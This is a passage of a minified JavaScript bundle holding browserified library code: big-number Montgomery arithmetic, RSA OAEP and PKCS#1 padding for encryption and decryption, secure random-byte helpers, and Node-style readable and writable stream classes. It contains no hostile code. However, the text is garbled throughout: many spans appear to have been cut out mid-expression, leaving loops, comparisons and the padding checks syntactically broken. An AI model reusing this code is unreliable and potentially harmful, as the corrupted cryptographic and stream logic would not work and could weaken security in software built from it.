I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,M),J=this.pow(l,M.addn(1).iushrn(1)),Z=this.pow(l,M),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();Q(Ae=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==M[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,M[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var v=l.imul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var v=l.mul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},8064:(Pe,we,de)=>{var ie=de(3262),j=de(7489),Q=de(5174),ae=de(3355),I=de(2005),$=de(2161),U=de(623),E=de(265).Buffer;Pe.exports=function(A,p,D){var w;w=A.padding?A.padding:D?1:4;var O,x=ie(A),S=x.modulus.byteLength();if(p.length>S||new ae(p).cmp(x.modulus)>=0)throw new Error("decryption error");O=D?U(new ae(p),x):I(p,x);var B=E.alloc(S-O.length);if(O=E.concat([B,O],S),4===w)return function C(y,A){var p=y.modulus.byteLength(),D=$("sha1").update(E.alloc(0)).digest(),w=D.length;if(0!==A[0])throw new Error("decryption error");var x=A.slice(1,w+1),S=A.slice(w+1),O=Q(x,j(S,w)),B=Q(S,j(O,p-w-1));if(function _(y,A){y=E.from(y),A=E.from(A);var p=0,D=y.length;y.length!==A.length&&(p++,D=Math.min(y.length,A.length));for(var w=-1;++w=A.length){x++;break}var S=A.slice(2,w-1);if(("0002"!==D.toString("hex")&&!p||"0001"!==D.toString("hex")&&p)&&x++,S.length<8&&x++,x)throw new Error("decryption error");return A.slice(w)}(0,O,D);if(3===w)return O;throw new Error("unknown padding")}},1599:(Pe,we,de)=>{var ie=de(3262),j=de(2419),Q=de(2161),ae=de(7489),I=de(5174),$=de(3355),U=de(623),E=de(2005),C=de(265).Buffer;Pe.exports=function(p,D,w){var x;x=p.padding?p.padding:w?1:4;var O,S=ie(p);if(4===x)O=function b(A,p){var D=A.modulus.byteLength(),w=p.length,x=Q("sha1").update(C.alloc(0)).digest(),S=x.length,O=2*S;if(w>D-O-2)throw new Error("message too long");var B=C.alloc(D-w-O-2),K=D-S-1,ee=j(S),se=I(C.concat([x,B,C.alloc(1,1),p],K),ae(ee,K)),ve=I(ee,ae(se,S));return new $(C.concat([C.alloc(1),ve,se],D))}(S,D);else if(1===x)O=function _(A,p,D){var S,w=p.length,x=A.modulus.byteLength();if(w>x-11)throw new Error("message too long");return S=D?C.alloc(x-w-3,255):function y(A){for(var S,p=C.allocUnsafe(A),D=0,w=j(2*A),x=0;D=0)throw new Error("data too long for modulus")}return w?E(O,S):U(O,S)}},623:(Pe,we,de)=>{var ie=de(3355),j=de(265).Buffer;Pe.exports=function Q(ae,I){return j.from(ae.toRed(ie.mont(I.modulus)).redPow(new ie(I.publicExponent)).fromRed().toArray())}},5174:Pe=>{Pe.exports=function(de,ie){for(var j=de.length,Q=-1;++Q{"use strict";var ie=de(5486),j=65536,I=de(265).Buffer,$=global.crypto||global.msCrypto;Pe.exports=$&&$.getRandomValues?function U(E,C){if(E>4294967295)throw new RangeError("requested too many random bytes");var b=I.allocUnsafe(E);if(E>0)if(E>j)for(var _=0;_{"use strict";var ie=de(5486);function j(){throw new Error("secure random number generation not supported by this browser\nuse chrome, FireFox or Internet Explorer 11")}var Q=de(265),ae=de(2419),I=Q.Buffer,$=Q.kMaxLength,U=global.crypto||global.msCrypto,E=Math.pow(2,32)-1;function C(p,D){if("number"!=typeof p||p!=p)throw new TypeError("offset must be a number");if(p>E||p<0)throw new TypeError("offset must be a uint32");if(p>$||p>D)throw new RangeError("offset out of range")}function b(p,D,w){if("number"!=typeof p||p!=p)throw new TypeError("size must be a number");if(p>E||p<0)throw new TypeError("size must be a uint32");if(p+D>w||p>$)throw new RangeError("buffer too small")}function y(p,D,w,x){if(ie.browser){var O=new Uint8Array(p.buffer,D,w);return U.getRandomValues(O),x?void ie.nextTick(function(){x(null,p)}):p}if(!x)return ae(w).copy(p,D),p;ae(w,function(K,ee){if(K)return x(K);ee.copy(p,D),x(null,p)})}U&&U.getRandomValues||!ie.browser?(we.randomFill=function _(p,D,w,x){if(!(I.isBuffer(p)||p instanceof global.Uint8Array))throw new TypeError('"buf" argument must be a Buffer or Uint8Array');if("function"==typeof D)x=D,D=0,w=p.length;else if("function"==typeof w)x=w,w=p.length-D;else if("function"!=typeof x)throw new TypeError('"cb" argument must be a function');return C(D,p.length),b(w,D,p.length),y(p,D,w,x)},we.randomFillSync=function A(p,D,w){if(void 0===D&&(D=0),!(I.isBuffer(p)||p instanceof global.Uint8Array))throw new TypeError('"buf" argument must be a Buffer or Uint8Array');return C(D,p.length),void 0===w&&(w=p.length-D),b(w,D,p.length),y(p,D,w)}):(we.randomFill=j,we.randomFillSync=j)},3749:Pe=>{"use strict";var de={};function ie($,U,E){E||(E=Error);var b=function(_){function y(A,p,D){return _.call(this,function C(_,y,A){return"string"==typeof U?U:U(_,y,A)}(A,p,D))||this}return function we($,U){$.prototype=Object.create(U.prototype),$.prototype.constructor=$,$.__proto__=U}(y,_),y}(E);b.prototype.name=E.name,b.prototype.code=$,de[$]=b}function j($,U){if(Array.isArray($)){var E=$.length;return $=$.map(function(C){return String(C)}),E>2?"one of ".concat(U," ").concat($.slice(0,E-1).join(", "),", or ")+$[E-1]:2===E?"one of ".concat(U," ").concat($[0]," or ").concat($[1]):"of ".concat(U," ").concat($[0])}return"of ".concat(U," ").concat(String($))}ie("ERR_INVALID_OPT_VALUE",function($,U){return'The value "'+U+'" is invalid for option "'+$+'"'},TypeError),ie("ERR_INVALID_ARG_TYPE",function($,U,E){var C,b;if("string"==typeof U&&function Q($,U,E){return $.substr(!E||E<0?0:+E,U.length)===U}(U,"not ")?(C="must not be",U=U.replace(/^not /,"")):C="must be",function ae($,U,E){return(void 0===E||E>$.length)&&(E=$.length),$.substring(E-U.length,E)===U}($," argument"))b="The ".concat($," ").concat(C," ").concat(j(U,"type"));else{var _=function I($,U,E){return"number"!=typeof E&&(E=0),!(E+U.length>$.length)&&-1!==$.indexOf(U,E)}($,".")?"property":"argument";b='The "'.concat($,'" ').concat(_," ").concat(C," ").concat(j(U,"type"))}return b+". Received type ".concat(typeof E)},TypeError),ie("ERR_STREAM_PUSH_AFTER_EOF","stream.push() after EOF"),ie("ERR_METHOD_NOT_IMPLEMENTED",function($){return"The "+$+" method is not implemented"}),ie("ERR_STREAM_PREMATURE_CLOSE","Premature close"),ie("ERR_STREAM_DESTROYED",function($){return"Cannot call "+$+" after a stream was destroyed"}),ie("ERR_MULTIPLE_CALLBACK","Callback called multiple times"),ie("ERR_STREAM_CANNOT_PIPE","Cannot pipe, not readable"),ie("ERR_STREAM_WRITE_AFTER_END","write after end"),ie("ERR_STREAM_NULL_VALUES","May not write null values to stream",TypeError),ie("ERR_UNKNOWN_ENCODING",function($){return"Unknown encoding: "+$},TypeError),ie("ERR_STREAM_UNSHIFT_AFTER_END_EVENT","stream.unshift() after end event"),Pe.exports.q=de},5157:(Pe,we,de)=>{"use strict";var ie=de(5486),j=Object.keys||function(_){var y=[];for(var A in _)y.push(A);return y};Pe.exports=E;var Q=de(5455),ae=de(2481);de(2270)(E,Q);for(var I=j(ae.prototype),$=0;${"use strict";Pe.exports=j;var ie=de(3148);function j(Q){if(!(this instanceof j))return new j(Q);ie.call(this,Q)}de(2270)(j,ie),j.prototype._transform=function(Q,ae,I){I(null,Q)}},5455:(Pe,we,de)=>{"use strict";var j,ie=de(5486);Pe.exports=l,l.ReadableState=z,de(8227);var _,ae=function(me,Ke){return me.listeners(Ke).length},I=de(7064),$=de(5449).Buffer,U=("undefined"!=typeof global?global:"undefined"!=typeof window?window:"undefined"!=typeof self?self:{}).Uint8Array||function(){},b=de(4616);_=b&&b.debuglog?b.debuglog("stream"):function(){};var K,ee,se,y=de(658),A=de(3475),D=de(7456).getHighWaterMark,w=de(3749).q,x=w.ERR_INVALID_ARG_TYPE,S=w.ERR_STREAM_PUSH_AFTER_EOF,O=w.ERR_METHOD_NOT_IMPLEMENTED,B=w.ERR_STREAM_UNSHIFT_AFTER_END_EVENT;de(2270)(l,I);var ve=A.errorOrDestroy,le=["error","close","destroy","pause","resume"];function z(ze,me,Ke){j=j||de(5157),"boolean"!=typeof Ke&&(Ke=me instanceof j),this.objectMode=!!(ze=ze||{}).objectMode,Ke&&(this.objectMode=this.objectMode||!!ze.readableObjectMode),this.highWaterMark=D(this,ze,"readableHighWaterMark",Ke),this.buffer=new y,this.length=0,this.pipes=null,this.pipesCount=0,this.flowing=null,this.ended=!1,this.endEmitted=!1,this.reading=!1,this.sync=!0,this.needReadable=!1,this.emittedReadable=!1,this.readableListening=!1,this.resumeScheduled=!1,this.paused=!0,this.emitClose=!1!==ze.emitClose,this.autoDestroy=!!ze.autoDestroy,this.destroyed=!1,this.defaultEncoding=ze.defaultEncoding||"utf8",this.awaitDrain=0,this.readingMore=!1,this.decoder=null,this.encoding=null,ze.encoding&&(K||(K=de(5741).s),this.decoder=new K(ze.encoding),this.encoding=ze.encoding)}function l(ze){if(j=j||de(5157),!(this instanceof l))return new l(ze);this._readableState=new z(ze,this,this instanceof j),this.readable=!0,ze&&("function"==typeof ze.read&&(this._read=ze.read),"function"==typeof ze.destroy&&(this._destroy=ze.destroy)),I.call(this)}function f(ze,me,Ke,rt,Ge){_("readableAddChunk",me);var ht,Qe=ze._readableState;if(null===me)Qe.reading=!1,function L(ze,me){if(_("onEofChunk"),!me.ended){if(me.decoder){var Ke=me.decoder.end();Ke&&Ke.length&&(me.buffer.push(Ke),me.length+=me.objectMode?1:Ke.length)}me.ended=!0,me.sync?h(ze):(me.needReadable=!1,me.emittedReadable||(me.emittedReadable=!0,R(ze)))}}(ze,Qe);else if(Ge||(ht=function M(ze,me){var Ke;return!function C(ze){return $.isBuffer(ze)||ze instanceof U}(me)&&"string"!=typeof me&&void 0!==me&&!ze.objectMode&&(Ke=new x("chunk",["string","Buffer","Uint8Array"],me)),Ke}(Qe,me)),ht)ve(ze,ht);else if(Qe.objectMode||me&&me.length>0)if("string"!=typeof me&&!Qe.objectMode&&Object.getPrototypeOf(me)!==$.prototype&&(me=function E(ze){return $.from(ze)}(me)),rt)Qe.endEmitted?ve(ze,new B):v(ze,Qe,me,!0);else if(Qe.ended)ve(ze,new S);else{if(Qe.destroyed)return!1;Qe.reading=!1,Qe.decoder&&!Ke?(me=Qe.decoder.write(me),Qe.objectMode||0!==me.length?v(ze,Qe,me,!1):J(ze,Qe)):v(ze,Qe,me,!1)}else rt||(Qe.reading=!1,J(ze,Qe));return!Qe.ended&&(Qe.lengthme.highWaterMark&&(me.highWaterMark=function G(ze){return ze>=P?ze=P:(ze--,ze|=ze>>>1,ze|=ze>>>2,ze|=ze>>>4,ze|=ze>>>8,ze|=ze>>>16,ze++),ze}(ze)),ze<=me.length?ze:me.ended?me.length:(me.needReadable=!0,0))}function h(ze){var me=ze._readableState;_("emitReadable",me.needReadable,me.emittedReadable),me.needReadable=!1,me.emittedReadable||(_("emitReadable",me.flowing),me.emittedReadable=!0,ie.nextTick(R,ze))}function R(ze){var me=ze._readableState;_("emitReadable_",me.destroyed,me.length,me.ended),!me.destroyed&&(me.length||me.ended)&&(ze.emit("readable"),me.emittedReadable=!1),me.needReadable=!me.flowing&&!me.ended&&me.length<=me.highWaterMark,He(ze)}function J(ze,me){me.readingMore||(me.readingMore=!0,ie.nextTick(Z,ze,me))}function Z(ze,me){for(;!me.reading&&!me.ended&&(me.length0,me.resumeScheduled&&!me.paused?me.flowing=!0:ze.listenerCount("data")>0&&ze.resume()}function Ae(ze){_("readable nexttick read 0"),ze.read(0)}function Xe(ze,me){_("resume",me.reading),me.reading||ze.read(0),me.resumeScheduled=!1,ze.emit("resume"),He(ze),me.flowing&&!me.reading&&ze.read(0)}function He(ze){var me=ze._readableState;for(_("flow",me.flowing);me.flowing&&null!==ze.read(););}function Be(ze,me){return 0===me.length?null:(me.objectMode?Ke=me.buffer.shift():!ze||ze>=me.length?(Ke=me.decoder?me.buffer.join(""):1===me.buffer.length?me.buffer.first():me.buffer.concat(me.length),me.buffer.clear()):Ke=me.buffer.consume(ze,me.decoder),Ke);var Ke}function qe(ze){var me=ze._readableState;_("endReadable",me.endEmitted),me.endEmitted||(me.ended=!0,ie.nextTick(De,me,ze))}function De(ze,me){if(_("endReadableNT",ze.endEmitted,ze.length),!ze.endEmitted&&0===ze.length&&(ze.endEmitted=!0,me.readable=!1,me.emit("end"),ze.autoDestroy)){var Ke=me._writableState;(!Ke||Ke.autoDestroy&&Ke.finished)&&me.destroy()}}function Ve(ze,me){for(var Ke=0,rt=ze.length;Ke=me.highWaterMark:me.length>0)||me.ended))return _("read: emitReadable",me.length,me.ended),0===me.length&&me.ended?qe(this):h(this),null;if(0===(ze=X(ze,me))&&me.ended)return 0===me.length&&qe(this),null;var Ge,rt=me.needReadable;return _("need readable",rt),(0===me.length||me.length-ze0?Be(ze,me):null)?(me.needReadable=me.length<=me.highWaterMark,ze=0):(me.length-=ze,me.awaitDrain=0),0===me.length&&(me.ended||(me.needReadable=!0),Ke!==ze&&me.ended&&qe(this)),null!==Ge&&this.emit("data",Ge),Ge},l.prototype._read=function(ze){ve(this,new O("_read()"))},l.prototype.pipe=function(ze,me){var Ke=this,rt=this._readableState;switch(rt.pipesCount){case 0:rt.pipes=ze;break;case 1:rt.pipes=[rt.pipes,ze];break;default:rt.pipes.push(ze)}rt.pipesCount+=1,_("pipe count=%d opts=%j",rt.pipesCount,me);var Qe=me&&!1===me.end||ze===ie.stdout||ze===ie.stderr?Le:mt;function mt(){_("onend"),ze.end()}rt.endEmitted?ie.nextTick(Qe):Ke.once("end",Qe),ze.on("unpipe",function ht($e,st){_("onunpipe"),$e===Ke&&st&&!1===st.hasUnpiped&&(st.hasUnpiped=!0,function xe(){_("cleanup"),ze.removeListener("close",Oe),ze.removeListener("finish",Te),ze.removeListener("drain",lt),ze.removeListener("error",Je),ze.removeListener("unpipe",ht),Ke.removeListener("end",mt),Ke.removeListener("end",Le),Ke.removeListener("data",We),ft=!0,rt.awaitDrain&&(!ze._writableState||ze._writableState.needDrain)&<()}())});var lt=function ue(ze){return function(){var Ke=ze._readableState;_("pipeOnDrain",Ke.awaitDrain),Ke.awaitDrain&&Ke.awaitDrain--,0===Ke.awaitDrain&&ae(ze,"data")&&(Ke.flowing=!0,He(ze))}}(Ke);ze.on("drain",lt);var ft=!1;function We($e){_("ondata");var st=ze.write($e);_("dest.write",st),!1===st&&((1===rt.pipesCount&&rt.pipes===ze||rt.pipesCount>1&&-1!==Ve(rt.pipes,ze))&&!ft&&(_("false write response, pause",rt.awaitDrain),rt.awaitDrain++),Ke.pause())}function Je($e){_("onerror",$e),Le(),ze.removeListener("error",Je),0===ae(ze,"error")&&ve(ze,$e)}function Oe(){ze.removeListener("finish",Te),Le()}function Te(){_("onfinish"),ze.removeListener("close",Oe),Le()}function Le(){_("unpipe"),Ke.unpipe(ze)}return Ke.on("data",We),function ye(ze,me,Ke){if("function"==typeof ze.prependListener)return ze.prependListener(me,Ke);ze._events&&ze._events[me]?Array.isArray(ze._events[me])?ze._events[me].unshift(Ke):ze._events[me]=[Ke,ze._events[me]]:ze.on(me,Ke)}(ze,"error",Je),ze.once("close",Oe),ze.once("finish",Te),ze.emit("pipe",Ke),rt.flowing||(_("pipe resume"),Ke.resume()),ze},l.prototype.unpipe=function(ze){var me=this._readableState,Ke={hasUnpiped:!1};if(0===me.pipesCount)return this;if(1===me.pipesCount)return ze&&ze!==me.pipes||(ze||(ze=me.pipes),me.pipes=null,me.pipesCount=0,me.flowing=!1,ze&&ze.emit("unpipe",this,Ke)),this;if(!ze){var rt=me.pipes,Ge=me.pipesCount;me.pipes=null,me.pipesCount=0,me.flowing=!1;for(var Qe=0;Qe0,!1!==rt.flowing&&this.resume()):"readable"===ze&&!rt.endEmitted&&!rt.readableListening&&(rt.readableListening=rt.needReadable=!0,rt.flowing=!1,rt.emittedReadable=!1,_("on readable",rt.length,rt.reading),rt.length?h(this):rt.reading||ie.nextTick(Ae,this)),Ke},l.prototype.removeListener=function(ze,me){var Ke=I.prototype.removeListener.call(this,ze,me);return"readable"===ze&&ie.nextTick(Ie,this),Ke},l.prototype.removeAllListeners=function(ze){var me=I.prototype.removeAllListeners.apply(this,arguments);return("readable"===ze||void 0===ze)&&ie.nextTick(Ie,this),me},l.prototype.resume=function(){var ze=this._readableState;return ze.flowing||(_("resume"),ze.flowing=!ze.readableListening,function Ue(ze,me){me.resumeScheduled||(me.resumeScheduled=!0,ie.nextTick(Xe,ze,me))}(this,ze)),ze.paused=!1,this},l.prototype.pause=function(){return _("call pause flowing=%j",this._readableState.flowing),!1!==this._readableState.flowing&&(_("pause"),this._readableState.flowing=!1,this.emit("pause")),this._readableState.paused=!0,this},l.prototype.wrap=function(ze){var me=this,Ke=this._readableState,rt=!1;for(var Ge in ze.on("end",function(){if(_("wrapped end"),Ke.decoder&&!Ke.ended){var ht=Ke.decoder.end();ht&&ht.length&&me.push(ht)}me.push(null)}),ze.on("data",function(ht){_("wrapped data"),Ke.decoder&&(ht=Ke.decoder.write(ht)),Ke.objectMode&&null==ht||!(Ke.objectMode||ht&&ht.length)||me.push(ht)||(rt=!0,ze.pause())}),ze)void 0===this[Ge]&&"function"==typeof ze[Ge]&&(this[Ge]=function(mt){return function(){return ze[mt].apply(ze,arguments)}}(Ge));for(var Qe=0;Qe{"use strict";Pe.exports=E;var ie=de(3749).q,j=ie.ERR_METHOD_NOT_IMPLEMENTED,Q=ie.ERR_MULTIPLE_CALLBACK,ae=ie.ERR_TRANSFORM_ALREADY_TRANSFORMING,I=ie.ERR_TRANSFORM_WITH_LENGTH_0,$=de(5157);function U(_,y){var A=this._transformState;A.transforming=!1;var p=A.writecb;if(null===p)return this.emit("error",new Q);A.writechunk=null,A.writecb=null,null!=y&&this.push(y),p(_);var D=this._readableState;D.reading=!1,(D.needReadable||D.length{"use strict";var ae,ie=de(5486);function Q(He){var Be=this;this.next=null,this.entry=null,this.finish=function(){!function Xe(He,Be,qe){var De=He.entry;for(He.entry=null;De;){var Ve=De.callback;Be.pendingcb--,Ve(qe),De=De.next}Be.corkedRequestsFree.next=He}(Be,He)}}Pe.exports=z,z.WritableState=le;var ye,I={deprecate:de(7226)},$=de(7064),U=de(5449).Buffer,E=("undefined"!=typeof global?global:"undefined"!=typeof window?window:"undefined"!=typeof self?self:{}).Uint8Array||function(){},_=de(3475),A=de(7456).getHighWaterMark,p=de(3749).q,D=p.ERR_INVALID_ARG_TYPE,w=p.ERR_METHOD_NOT_IMPLEMENTED,x=p.ERR_MULTIPLE_CALLBACK,S=p.ERR_STREAM_CANNOT_PIPE,O=p.ERR_STREAM_DESTROYED,B=p.ERR_STREAM_NULL_VALUES,K=p.ERR_STREAM_WRITE_AFTER_END,ee=p.ERR_UNKNOWN_ENCODING,se=_.errorOrDestroy;function ve(){}function le(He,Be,qe){ae=ae||de(5157),"boolean"!=typeof qe&&(qe=Be instanceof ae),this.objectMode=!!(He=He||{}).objectMode,qe&&(this.objectMode=this.objectMode||!!He.writableObjectMode),this.highWaterMark=A(this,He,"writableHighWaterMark",qe),this.finalCalled=!1,this.needDrain=!1,this.ending=!1,this.ended=!1,this.finished=!1,this.destroyed=!1,this.decodeStrings=!(!1===He.decodeStrings),this.defaultEncoding=He.defaultEncoding||"utf8",this.length=0,this.writing=!1,this.corked=0,this.sync=!0,this.bufferProcessing=!1,this.onwrite=function(Ve){!function L(He,Be){var qe=He._writableState,De=qe.sync,Ve=qe.writecb;if("function"!=typeof Ve)throw new x;if(function X(He){He.writing=!1,He.writecb=null,He.length-=He.writelen,He.writelen=0}(qe),Be)!function G(He,Be,qe,De,Ve){--Be.pendingcb,qe?(ie.nextTick(Ve,De),ie.nextTick(Ae,He,Be),He._writableState.errorEmitted=!0,se(He,De)):(Ve(De),He._writableState.errorEmitted=!0,se(He,De),Ae(He,Be))}(He,qe,De,Be,Ve);else{var ze=Z(qe)||He.destroyed;!ze&&!qe.corked&&!qe.bufferProcessing&&qe.bufferedRequest&&J(He,qe),De?ie.nextTick(h,He,qe,ze,Ve):h(He,qe,ze,Ve)}}(Be,Ve)},this.writecb=null,this.writelen=0,this.bufferedRequest=null,this.lastBufferedRequest=null,this.pendingcb=0,this.prefinished=!1,this.errorEmitted=!1,this.emitClose=!1!==He.emitClose,this.autoDestroy=!!He.autoDestroy,this.bufferedRequestCount=0,this.corkedRequestsFree=new Q(this)}function z(He){var Be=this instanceof(ae=ae||de(5157));if(!Be&&!ye.call(z,this))return new z(He);this._writableState=new le(He,this,Be),this.writable=!0,He&&("function"==typeof He.write&&(this._write=He.write),"function"==typeof He.writev&&(this._writev=He.writev),"function"==typeof He.destroy&&(this._destroy=He.destroy),"function"==typeof He.final&&(this._final=He.final)),$.call(this)}function P(He,Be,qe,De,Ve,ze,me){Be.writelen=De,Be.writecb=me,Be.writing=!0,Be.sync=!0,Be.destroyed?Be.onwrite(new O("write")):qe?He._writev(Ve,Be.onwrite):He._write(Ve,ze,Be.onwrite),Be.sync=!1}function h(He,Be,qe,De){qe||function R(He,Be){0===Be.length&&Be.needDrain&&(Be.needDrain=!1,He.emit("drain"))}(He,Be),Be.pendingcb--,De(),Ae(He,Be)}function J(He,Be){Be.bufferProcessing=!0;var qe=Be.bufferedRequest;if(He._writev&&qe&&qe.next){var Ve=new Array(Be.bufferedRequestCount),ze=Be.corkedRequestsFree;ze.entry=qe;for(var me=0,Ke=!0;qe;)Ve[me]=qe,qe.isBuf||(Ke=!1),qe=qe.next,me+=1;Ve.allBuffers=Ke,P(He,Be,!0,Be.length,Ve,"",ze.finish),Be.pendingcb++,Be.lastBufferedRequest=null,ze.next?(Be.corkedRequestsFree=ze.next,ze.next=null):Be.corkedRequestsFree=new Q(Be),Be.bufferedRequestCount=0}else{for(;qe;){var rt=qe.chunk;if(P(He,Be,!1,Be.objectMode?1:rt.length,rt,qe.encoding,qe.callback),qe=qe.next,Be.bufferedRequestCount--,Be.writing)break}null===qe&&(Be.lastBufferedRequest=null)}Be.bufferedRequest=qe,Be.bufferProcessing=!1}function Z(He){return He.ending&&0===He.length&&null===He.bufferedRequest&&!He.finished&&!He.writing}function ue(He,Be){He._final(function(qe){Be.pendingcb--,qe&&se(He,qe),Be.prefinished=!0,He.emit("prefinish"),Ae(He,Be)})}function Ae(He,Be){var qe=Z(Be);if(qe&&(function Ie(He,Be){!Be.prefinished&&!Be.finalCalled&&("function"!=typeof He._final||Be.destroyed?(Be.prefinished=!0,He.emit("prefinish")):(Be.pendingcb++,Be.finalCalled=!0,ie.nextTick(ue,He,Be)))}(He,Be),0===Be.pendingcb&&(Be.finished=!0,He.emit("finish"),Be.autoDestroy))){var De=He._readableState;(!De||De.autoDestroy&&De.endEmitted)&&He.destroy()}return qe}de(2270)(z,$),le.prototype.getBuffer=function(){for(var Be=this.bufferedRequest,qe=[];Be;)qe.push(Be),Be=Be.next;return qe},function(){try{Object.defineProperty(le.prototype,"buffer",{get:I.deprecate(function(){return this.getBuffer()},"_writableState.buffer is deprecated. Use _writableState.getBuffer instead.","DEP0003")})}catch(He){}}(),"function"==typeof Symbol&&Symbol.hasInstance&&"function"==typeof Function.prototype[Symbol.hasInstance]?(ye=Function.prototype[Symbol.hasInstance],Object.defineProperty(z,Symbol.hasInstance,{value:function(Be){return!!ye.call(this,Be)||this===z&&Be&&Be._writableState instanceof le}})):ye=function(Be){return Be instanceof this},z.prototype.pipe=function(){se(this,new S)},z.prototype.write=function(He,Be,qe){var De=this._writableState,Ve=!1,ze=!De.objectMode&&function b(He){return U.isBuffer(He)||He instanceof E}(He);return ze&&!U.isBuffer(He)&&(He=function C(He){return U.from(He)}(He)),"function"==typeof Be&&(qe=Be,Be=null),ze?Be="buffer":Be||(Be=De.defaultEncoding),"function"!=typeof qe&&(qe=ve),De.ending?function l(He,Be){var qe=new K;se(He,qe),ie.nextTick(Be,qe)}(this,qe):(ze||function f(He,Be,qe,De){var Ve;return null===qe?Ve=new B:"string"!=typeof qe&&!Be.objectMode&&(Ve=new D("chunk",["string","Buffer"],qe)),!Ve||(se(He,Ve),ie.nextTick(De,Ve),!1)}(this,De,He,qe))&&(De.pendingcb++,Ve=function M(He,Be,qe,De,Ve,ze){if(!qe){var me=function v(He,Be,qe){return!He.objectMode&&!1!==He.decodeStrings&&"string"==typeof Be&&(Be=U.from(Be,qe)),Be}(Be,De,Ve);De!==me&&(qe=!0,Ve="buffer",De=me)}var Ke=Be.objectMode?1:De.length;Be.length+=Ke;var rt=Be.length-1))throw new ee(Be);return this._writableState.defaultEncoding=Be,this},Object.defineProperty(z.prototype,"writableBuffer",{enumerable:!1,get:function(){return this._writableState&&this._writableState.getBuffer()}}),Object.defineProperty(z.prototype,"writableHighWaterMark",{enumerable:!1,get:function(){return this._writableState.highWaterMark}}),z.prototype._write=function(He,Be,qe){qe(new w("_write()"))},z.prototype._writev=null,z.prototype.end=function(He,Be,qe){var De=this._writableState;return"function"==typeof He?(qe=He,He=null,Be=null):"function"==typeof Be&&(qe=Be,Be=null),null!=He&&this.write(He,Be),De.corked&&(De.corked=1,this.uncork()),De.ending||function Ue(He,Be,qe){Be.ending=!0,Ae(He,Be),qe&&(Be.finished?ie.nextTick(qe):He.once("finish",qe)),Be.ended=!0,He.writable=!1}(this,De,qe),this},Object.defineProperty(z.prototype,"writableLength",{enumerable:!1,get:function(){return this._writableState.length}}),Object.defineProperty(z.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._writableState&&this._writableState.destroyed},set:function(Be){!this._writableState||(this._writableState.destroyed=Be)}}),z.prototype.destroy=_.destroy,z.prototype._undestroy=_.undestroy,z.prototype._destroy=function(He,Be){Be(He)}},9082:(Pe,we,de)=>{"use strict";var j,ie=de(5486);function Q(K,ee,se){return ee=function ae(K){var ee=function I(K,ee){if("object"!=typeof K||null===K)return K;var se=K[Symbol.toPrimitive];if(void 0!==se){var ve=se.call(K,ee||"default");if("object"!=typeof ve)return ve;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===ee?String:Number)(K)}(K,"string");return"symbol"==typeof ee?ee:String(ee)}(ee),ee in K?Object.defineProperty(K,ee,{value:se,enumerable:!0,configurable:!0,writable:!0}):K[ee]=se,K}var $=de(1341),U=Symbol("lastResolve"),E=Symbol("lastReject"),C=Symbol("error"),b=Symbol("ended"),_=Symbol("lastPromise"),y=Symbol("handlePromise"),A=Symbol("stream");function p(K,ee){return{value:K,done:ee}}function D(K){var ee=K[U];if(null!==ee){var se=K[A].read();null!==se&&(K[_]=null,K[U]=null,K[E]=null,ee(p(se,!1)))}}function w(K){ie.nextTick(D,K)}var S=Object.getPrototypeOf(function(){}),O=Object.setPrototypeOf((Q(j={get stream(){return this[A]},next:function(){var ee=this,se=this[C];if(null!==se)return Promise.reject(se);if(this[b])return Promise.resolve(p(void 0,!0));if(this[A].destroyed)return new Promise(function(z,l){ie.nextTick(function(){ee[C]?l(ee[C]):z(p(void 0,!0))})});var le,ve=this[_];if(ve)le=new Promise(function x(K,ee){return function(se,ve){K.then(function(){ee[b]?se(p(void 0,!0)):ee[y](se,ve)},ve)}}(ve,this));else{var ye=this[A].read();if(null!==ye)return Promise.resolve(p(ye,!1));le=new Promise(this[y])}return this[_]=le,le}},Symbol.asyncIterator,function(){return this}),Q(j,"return",function(){var ee=this;return new Promise(function(se,ve){ee[A].destroy(null,function(le){le?ve(le):se(p(void 0,!0))})})}),j),S);Pe.exports=function(ee){var se,ve=Object.create(O,(Q(se={},A,{value:ee,writable:!0}),Q(se,U,{value:null,writable:!0}),Q(se,E,{value:null,writable:!0}),Q(se,C,{value:null,writable:!0}),Q(se,b,{value:ee._readableState.endEmitted,writable:!0}),Q(se,y,{value:function(ye,z){var l=ve[A].read();l?(ve[_]=null,ve[U]=null,ve[E]=null,ye(p(l,!1))):(ve[U]=ye,ve[E]=z)},writable:!0}),se));return ve[_]=null,$(ee,function(le){if(le&&"ERR_STREAM_PREMATURE_CLOSE"!==le.code){var ye=ve[E];return null!==ye&&(ve[_]=null,ve[U]=null,ve[E]=null,ye(le)),void(ve[C]=le)}var z=ve[U];null!==z&&(ve[_]=null,ve[U]=null,ve[E]=null,z(p(void 0,!0))),ve[b]=!0}),ee.on("readable",w.bind(null,ve)),ve}},658:(Pe,we,de)=>{"use 